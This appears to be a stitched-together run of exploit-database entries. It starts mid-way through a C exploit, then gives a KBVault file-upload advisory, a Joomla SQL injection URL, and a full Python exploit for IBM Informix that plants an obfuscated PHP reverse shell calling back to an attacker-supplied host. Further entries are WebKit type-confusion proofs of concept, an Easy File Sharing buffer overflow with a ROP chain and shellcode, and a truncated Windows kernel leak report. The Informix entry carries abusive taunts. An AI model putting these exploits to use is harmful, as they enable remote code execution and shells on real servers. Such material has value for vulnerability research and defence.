if (rename(TTY_SYMLINK_, TTY_SYMLINK)) die();
if (kill(pid, SIGCONT)) die();
int status = 0;
if (waitpid(pid, &status, WUNTRACED) != pid) die();
if (!WIFEXITED(status)) die();
if (unlink(comm)) die();
if (unlink(TTY_SYMLINK)) die();
if (rmdir(WORKING_DIR)) die();
exit(WEXITSTATUS(status));
}
# Exploit Title: [KBVault MySQL v0.16a - Unauthenticated File Upload to Run Code]
# Google Dork: [inurl:"FileExplorer/Explorer.aspx"]
# Date: [2017-06-14]
# Exploit Author: [Fatih Emiral]
# Vendor Homepage: [http://kbvaultmysql.codeplex.com/]
# Software Link: [http://kbvaultmysql.codeplex.com/downloads/get/858806]
# Version: [0.16a]
# Tested on: [Windows 7 (applicable to all Windows platforms)]
# CVE : [CVE-2017-9602]
1. Description
KBVault Mysql Free Knowledge Base application package comes with a third party file management component. An unauthenticated user can access the file upload (and delete) functionality using the following URI:
http://host/FileExplorer/Explorer.aspx?id=/Uploads
2. Exploit
Through this functionality a user can upload an ASPX script to run any arbitrary code, e.g.:
http://host/Uploads/Documents/cmd.aspx
3. Solution
Unauthenticated access to the file management function should be prohibited.
File uploads should be checked against executable formats, and only acceptable file types should be allowed to upload.
4. Disclosure Timeline
2017-06-09: Vendor notification
2017-06-09: Vendor responded with intention to fix the vulnerability
2017-06-12: CVE number acquired
2017-06-15: Public disclosure
# # # # #
# Exploit Title: Joomla! Component JoomRecipe 1.0.3 - SQL Injection
# Dork: N/A
# Date: 15.06.2017
# Vendor : http://joomboost.com/
# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/
# Demo: http://demo-joomrecipe.joomboost.com/
# Version: 1.0.3
# # # # #
# Author: EziBilisim
# Author Web: https://ezibilisim.com/
# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar.
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/all-recipes/category/[SQL]
# # # # #
#!/usr/local/bin/python
"""
IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
Bonus: free XXE bug included!
Download: https://www-01.ibm.com/marketing/iwm/iwm/web/reg/download.do?source=swg-informixfpd&S_PKG=dl&lang=en_US&cp=UTF-8&dlmethod=http
Twitter: https://twitter.com/rgod777
Found by: IMgod aka rgay
About:
~~~~~~
So after Andrea Micalizzi decided to audit this software and found some bugs I decided to audit it too. (see https://blogs.securiteam.com/index.php/archives/3210)
What's that? Where is all your main frame, super 1337 hacks now rgod? Why did you miss these 3 bugs?
- unauthed XXE
- unauthed SQLi
- unauthed RCE
Your ub3r 31337 PHP hacks are soooooooooooo cool, maybe you should commit seppuku again. Or maybe you should have taken one of the 143 jobs you were offered? Cos I'm about to rekt dis cunt.
Vulnerable Code:
~~~~~~~~~~~~~~~~
Of course, rgod misses this bug in openadmin/admin/index.php:
$admin->run(); // 1. calls run()
$idsadmin->html->render();
function run()
{
if ( isset ( $this->idsadmin->in['helpact'] )
&& $this->idsadmin->in['do'] != "doedithelp"
&& $this->idsadmin->in['do'] != "doaddhelp" )
{
header("Location: {$this->idsadmin->get_config("BASEURL")}/index.php?act=help&helpact={$this->idsadmin->in['helpact']}&helpdo={$this->idsadmin->in['helpdo']}");
die();
}
if ( isset($this->idsadmin->in['lang']) )
{
// If the user has changed the language, set the new language now.
$this->idsadmin->validate_lang_param();
$this->idsadmin->phpsession->set_lang($this->idsadmin->in['lang']);
}
switch( $this->idsadmin->in['do'] ) // 2. switch our do parameter
{
case "getconnections":
if ( ! isset($this->idsadmin->in['group_num']) )
{
$grpnum = 1;
}
else
{
$grpnum = $this->idsadmin->in['group_num'];
}
$this->getconnections($grpnum);
break;
...
case "doconfig":
$this->idsadmin->html->set_pagetitle($this->idsadmin->lang("OATconfig"));
$this->doconfig(); // 3. calls doconfig
break;
Now, onto the doconfig function:
function doconfig()
{
// None of the config parameters can contain quotes.
foreach ($this->idsadmin->in as $i => $v)
{
if (strstr($v,"\"") || strstr($v,"'"))
{
$this->idsadmin->load_lang("global");
$this->idsadmin->error($this->idsadmin->lang("invalidParamNoQuotes",array($i)));
$this->config();
return;
}
}
$conf_vars = array (
"LANG" => $this->idsadmin->lang("LANG")
,"CONNDBDIR" => $this->idsadmin->lang("CONNDBDIR")
,"BASEURL" => $this->idsadmin->lang("BASEURL")
,"HOMEDIR" => $this->idsadmin->lang("HOMEDIR")
,"HOMEPAGE" => $this->idsadmin->lang("HOMEPAGE")
,"PINGINTERVAL" => $this->idsadmin->lang("PINGINTERVAL")
,"ROWSPERPAGE" => $this->idsadmin->lang("ROWSPERPAGE")
,"SECURESQL" => $this->idsadmin->lang("SECURESQL")
,"INFORMIXCONTIME" => $this->idsadmin->lang("INFORMIXCONTIME")
,"INFORMIXCONRETRY" => $this->idsadmin->lang("INFORMIXCONRETRY")
);
# create backup of file
$src=$this->idsadmin->get_config('HOMEDIR')."/conf/config.php";
$dest=$this->idsadmin->in['HOMEDIR']."/conf/BAKconfig.php";
copy($src,$dest);
# open the file
if (! is_writable($src))
{
$this->config($this->idsadmin->lang("SaveCfgFailure"). " $src");
return;
}
$fd = fopen($src,'w+'); // 4. get a handle to a php file
# write out the conf
fputs($fd,"<?php \n");
foreach ($conf_vars as $k => $v)
{
if ($k == "CONNDBDIR" || $k == "HOMEDIR")
{
// Replace backslashes in paths with forward slashes
$this->idsadmin->in[$k] = str_replace('\\', '/', $this->idsadmin->in[$k]);
}
$out = "\$CONF['{$k}']=\"{$this->idsadmin->in[$k]}\"; #{$v}\n"; // 5. dangerous
fputs($fd,$out); // 6. PHP Injection
}
fputs($fd,"?>\n");
fclose($fd);
$this->idsadmin->html->add_to_output($this->idsadmin->template["template_global"]->global_redirect($this->idsadmin->lang("SaveCfgSuccess"),"index.php?act=admin"));
} #end config
I suspect Andrea missed this bug because of this code:
// None of the config parameters can contain quotes.
foreach ($this->idsadmin->in as $i => $v)
{
if (strstr($v,"\"") || strstr($v,"'")) // check for double quotes
{
$this->idsadmin->load_lang("global");
$this->idsadmin->error($this->idsadmin->lang("invalidParamNoQuotes",array($i)));
$this->config();
return;
}
}
I'm sure his assumption was that if you can't break out of the double quotes, you can't get RCE. Well, MR I have 40 years experiance.
Example:
~~~~~~~~
sh-3.2$ ./poc.py
IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
Found By: IMgod aka rgay
(+) usage: ./poc.py <target> <connectback:port>
(+) eg: ./poc.py 192.168.1.172 192.168.1.1:1111
sh-3.2$ ./poc.py 192.168.1.172 192.168.1.1:1111
IBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)
Found By: IMgod aka rgay
(+) PHP code injection done!
(+) starting handler on port 1111
(+) connection from 172.16.175.172
(+) popping a shell!
id
uid=2(daemon) gid=2(daemon) groups=1(bin),2(daemon)
uname -a
Linux informixva 2.6.27.39-0.3-pae #1 SMP 2009-11-23 12:57:38 +0100 i686 i686 i386 GNU/Linux
"""
import sys
import requests
import telnetlib
import socket
from threading import Thread
from base64 import b64encode as b64e
def banner():
return """\n\tIBM Informix Dynamic Server doconfig PHP Code Injection Remote Code Execution Vulnerability (0DAY)\n\tFound by: IMgod aka rgay\n"""
def check_args():
global t, ls, lp
if len(sys.argv) < 3:
return False
t = "http://%s/openadmin/admin/index.php?act=admin&do=doimport" % sys.argv[1]
ls = sys.argv[2].split(":")[0]
lp = int(sys.argv[2].split(":")[1])
return True
def handler(lport):
print "(+) starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) popping a shell!"
t.interact()
# build the reverse php shell
def build_php_code():
phpkode = ("""
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
phpkode += ("""$dis=@ini_get('disable_functions');""")
phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
phpkode += ("""$nofuncs='no exec functions'; """)
phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (ls, lp))
phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (ls, lp))
phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
phpkode += ("""}@socket_close($s);} """)
return phpkode
def suntzu_omfg_no_one_can_steal_my_software_yo():
handlerthr = Thread(target=handler, args=(lp,))
handlerthr.start()
target = "http://127.0.0.1/openadmin/conf/config.php?c=eval%%28base64_decode%%28%%27%s%%27%%29%%29%%3b" % b64e(build_php_code())
p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
r = requests.post("%s" % t, files=f)
def suntzu_omfg_i_am_40_years_old_and_fuckn_fat():
target = "http://127.0.0.1/openadmin/admin/index.php?act=admin&do=doconfig&LANG=en_US&BASEURL=http%3A%2F%2Flocalhost%3A80%2Fopenadmin&HOMEDIR=%2Fopt%2FIBM%2FOpenAdmin%2FOAT%2FApache_2.4.2%2Fhtdocs%2Fopenadmin%2F&CONNDBDIR=%2Fopt%2FIBM%2FOpenAdmin%2FOAT%2FOAT_conf%2F&HOMEPAGE=%7b%24%7beval%28%24_GET%5bc%5d%29%7d%7d&PINGINTERVAL=300&ROWSPERPAGE=25&SECURESQL=on&INFORMIXCONTIME=20&INFORMIXCONRETRY=3&dosaveconf=Save"
p = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"%s\" >]><foo>&xxe;</foo>" % target
f = [('importfile', ('suntzu-rgod-is-so-elite', p, 'text/plain'))]
r = requests.post("%s" % t, files=f)
if r.status_code == 200:
return True
return False
def main():
print banner()
if not check_args():
print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
print "(+) eg: %s 192.168.1.172 192.168.1.1:1111" % sys.argv[0]
sys.exit()
if suntzu_omfg_i_am_40_years_old_and_fuckn_fat():
print "(+) PHP code injection done!"
suntzu_omfg_no_one_can_audit_my_software_yo()
if __name__ == '__main__':
main()
"""
Bonus bug SQL Injection!
POST /openadmin/admin/index.php?act=admin&do=doimport HTTP/1.1
Host: 192.168.1.172
Connection: close
Content-Type: multipart/form-data; boundary=--------1366435377
Content-Length: 258
----------1366435377
Content-Disposition: form-data; name="importfile"; filename="rektGOD.txt"
Content-Type: text/plain
<?xml version="1.0" encoding="ISO-8859-1"?>
<root><group name="rgay' or '1'=(select '1') -- "></group></root>
----------1366435377--
"""
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1208
After JSGlobalObject::haveABadTime is called, the type of all JavaScript arrays(including newly created arrays) are of the same type: ArrayWithSlowPutArrayStorage. But (of course) this only affects objects that share the same JSGlobalObject. So arrays come from another JSGlobalObject can cause type confusions.
void JSGlobalObject::haveABadTime(VM& vm)
{
...
for (unsigned i = 0; i < NumberOfIndexingShapes; ++i)
m_arrayStructureForIndexingShapeDuringAllocation[i].set(vm, this, originalArrayStructureForIndexingType(ArrayWithSlowPutArrayStorage)); <<-- The type of a newly created array will be ArrayWithSlowPutArrayStorage
...
while (!foundObjects.isEmpty()) {
JSObject* object = asObject(foundObjects.last());
foundObjects.removeLast();
ASSERT(hasBrokenIndexing(object));
object->switchToSlowPutArrayStorage(vm); <<------ switch type of an old array
}
}
1. fastSlice:
JSArray* JSArray::fastSlice(ExecState& exec, unsigned startIndex, unsigned count)
{
auto arrayType = indexingType();
switch (arrayType) {
case ArrayWithDouble:
case ArrayWithInt32:
case ArrayWithContiguous: {
VM& vm = exec.vm();
if (count >= MIN_SPARSE_ARRAY_INDEX || structure(vm)->holesMustForwardToPrototype(vm))
return nullptr;
Structure* resultStructure = exec.lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(arrayType);
JSArray* resultArray = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, count);
if (!resultArray)
return nullptr;
auto& resultButterfly = *resultArray->butterfly();
if (arrayType == ArrayWithDouble)
memcpy(resultButterfly.contiguousDouble().data(), m_butterfly.get()->contiguousDouble().data() + startIndex, sizeof(JSValue) * count);
else
memcpy(resultButterfly.contiguous().data(), m_butterfly.get()->contiguous().data() + startIndex, sizeof(JSValue) * count);
resultButterfly.setPublicLength(count);
return resultArray;
}
default:
return nullptr;
}
}
If |this| came from another JSGlobalObject, and |haveABadTime| was called, the type of |resultArray| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.
<html>
<body>
<script>
Array.prototype.__defineGetter__(100, () => 1);
let f = document.body.appendChild(document.createElement('iframe'));
let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320, 2.3023e-320);
let c = Array.prototype.slice.call(a);
alert(c);
</script>
</body>
</html>
2. arrayProtoPrivateFuncConcatMemcpy
EncodedJSValue JSC_HOST_CALL arrayProtoPrivateFuncConcatMemcpy(ExecState* exec)
{
...
JSArray* firstArray = jsCast<JSArray*>(exec->uncheckedArgument(0));
...
IndexingType type = firstArray->mergeIndexingTypeForCopying(secondType);
...
Structure* resultStructure = exec->lexicalGlobalObject()->arrayStructureForIndexingTypeDuringAllocation(type);
JSArray* result = JSArray::tryCreateForInitializationPrivate(vm, resultStructure, firstArraySize + secondArraySize);
if (!result)
return JSValue::encode(throwOutOfMemoryError(exec, scope));
if (type == ArrayWithDouble) {
double* buffer = result->butterfly()->contiguousDouble().data();
memcpy(buffer, firstButterfly->contiguousDouble().data(), sizeof(JSValue) * firstArraySize);
memcpy(buffer + firstArraySize, secondButterfly->contiguousDouble().data(), sizeof(JSValue) * secondArraySize);
} else if (type != ArrayWithUndecided) {
WriteBarrier<Unknown>* buffer = result->butterfly()->contiguous().data();
memcpy(buffer, firstButterfly->contiguous().data(), sizeof(JSValue) * firstArraySize);
if (secondType != ArrayWithUndecided)
memcpy(buffer + firstArraySize, secondButterfly->contiguous().data(), sizeof(JSValue) * secondArraySize);
else {
for (unsigned i = secondArraySize; i--;)
buffer[i + firstArraySize].clear();
}
}
result->butterfly()->setPublicLength(firstArraySize + secondArraySize);
return JSValue::encode(result);
}
If |firstArray| came from another JSGlobalObject, and |haveABadTime| was called, the type of |result| will be ArrayWithSlowPutArrayStorage. It will result in a type confusion.
PoC:
-->
<html>
<body>
<script>
Array.prototype.__defineGetter__(100, () => 1);
let f = document.body.appendChild(document.createElement('iframe'));
let a = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
let b = new f.contentWindow.Array(2.3023e-320, 2.3023e-320);
let c = Array.prototype.concat.call(a, b);
alert(c);
</script>
</body>
</html>
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP)
# Exploit Author: bl4ck h4ck3r
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows XP SP2, Windows 2008 R2 x64
import socket
import struct
import sys
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <host>\n"
exit()
# 0x1002280a : # ADD ESP,1004 # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
ret = struct.pack("<I", 0x1002280a)
# nopsled
shellcode = "\x90"*200
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
shellcode += "\x89\xe7\xd9\xec\xd9\x77\xf4\x5d\x55\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x39\x6c\x5a\x48\x6b\x32\x55\x50\x67\x70\x47\x70"
shellcode += "\x75\x30\x6e\x69\x78\x65\x65\x61\x39\x50\x31\x74"
shellcode += "\x4c\x4b\x50\x50\x46\x50\x4c\x4b\x36\x32\x36\x6c"
shellcode += "\x6c\x4b\x66\x32\x42\x34\x6c\x4b\x52\x52\x77\x58"
shellcode += "\x54\x4f\x4c\x77\x63\x7a\x31\x36\x66\x51\x4b\x4f"
shellcode += "\x4e\x4c\x47\x4c\x73\x51\x73\x4c\x76\x62\x76\x4c"
shellcode += "\x51\x30\x59\x51\x78\x4f\x46\x6d\x76\x61\x48\x47"
shellcode += "\x6a\x42\x79\x62\x50\x52\x50\x57\x4c\x4b\x63\x62"
shellcode += "\x36\x70\x4e\x6b\x30\x4a\x37\x4c\x6e\x6b\x42\x6c"
shellcode += "\x42\x31\x33\x48\x49\x73\x50\x48\x33\x31\x6a\x71"
shellcode += "\x42\x71\x4c\x4b\x63\x69\x47\x50\x45\x51\x4a\x73"
shellcode += "\x6c\x4b\x72\x69\x44\x58\x6b\x53\x67\x4a\x42\x69"
shellcode += "\x6e\x6b\x45\x64\x4c\x4b\x46\x61\x6b\x66\x35\x61"
shellcode += "\x39\x6f\x6c\x6c\x6b\x71\x58\x4f\x34\x4d\x46\x61"
shellcode += "\x6b\x77\x44\x78\x6d\x30\x71\x65\x59\x66\x64\x43"
shellcode += "\x61\x6d\x48\x78\x67\x4b\x61\x6d\x74\x64\x32\x55"
shellcode += "\x4d\x34\x42\x78\x6e\x6b\x32\x78\x44\x64\x56\x61"
shellcode += "\x68\x53\x62\x46\x4e\x6b\x36\x6c\x70\x4b\x4c\x4b"
shellcode += "\x56\x38\x35\x4c\x56\x61\x59\x43\x6c\x4b\x76\x64"
shellcode += "\x4c\x4b\x56\x61\x78\x50\x6e\x69\x61\x54\x37\x54"
shellcode += "\x55\x74\x53\x6b\x63\x6b\x63\x51\x32\x79\x71\x4a"
shellcode += "\x36\x31\x69\x6f\x4b\x50\x43\x6f\x31\x4f\x73\x6a"
shellcode += "\x6e\x6b\x36\x72\x58\x6b\x4c\x4d\x53\x6d\x52\x4a"
shellcode += "\x47\x71\x4c\x4d\x6f\x75\x48\x32\x43\x30\x53\x30"
shellcode += "\x67\x70\x32\x70\x31\x78\x34\x71\x4e\x6b\x32\x4f"
shellcode += "\x6c\x47\x39\x6f\x68\x55\x4f\x4b\x4c\x30\x68\x35"
shellcode += "\x4f\x52\x33\x66\x50\x68\x79\x36\x5a\x35\x6d\x6d"
shellcode += "\x4d\x4d\x49\x6f\x68\x55\x55\x6c\x76\x66\x53\x4c"
shellcode += "\x75\x5a\x6b\x30\x59\x6b\x59\x70\x72\x55\x33\x35"
shellcode += "\x6f\x4b\x37\x37\x76\x73\x74\x32\x70\x6f\x50\x6a"
shellcode += "\x67\x70\x50\x53\x59\x6f\x69\x45\x65\x33\x75\x31"
shellcode += "\x62\x4c\x61\x73\x46\x4e\x75\x35\x30\x78\x72\x45"
shellcode += "\x45\x50\x41\x41"
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
# 0x00000000, # [-] Unable to find gadget to put 00000201 into ebx
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0xFFFFFDFE, # -202
0x100231d1, # NEG EAX # RETN [ImageLoad.dll]
0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ}
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x1004de84, # &Writable location [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
0x61c0a798, # XCHG EAX,EDI # RETN [sqlite3.dll]
0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll]
0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
0x100218f9, # POP EBP # RETN [ImageLoad.dll]
0x61c24169, # & push esp # ret [sqlite3.dll]
0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
0x1001bd98, # POP ECX # RETN [ImageLoad.dll]
0x1004de84, # &Writable location [ImageLoad.dll]
0x61c373a4, # POP EDI # RETN [sqlite3.dll]
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
0x10015442, # POP EAX # RETN [ImageLoad.dll]
0x90909090, # nop
0x100240c2, # PUSHAD # RETN [ImageLoad.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
buf = "A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send("POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=" + buf + "&getPassword=Get+Password")
s.close()
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1189&desc=2
We have discovered that the nt!NtQueryInformationJobObject system call (corresponding to the documented QueryInformationJobObject() API function) called with the JobObjectExtendedLimitInformation information class discloses portions of uninitialized kernel stack memory to user-mode clients, due to output structure alignment holes.
On our test Windows 7 32-bit workstation, an example layout of the output buffer is as follows:
--- cut ---
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000020: 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ................
00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
--- cut ---
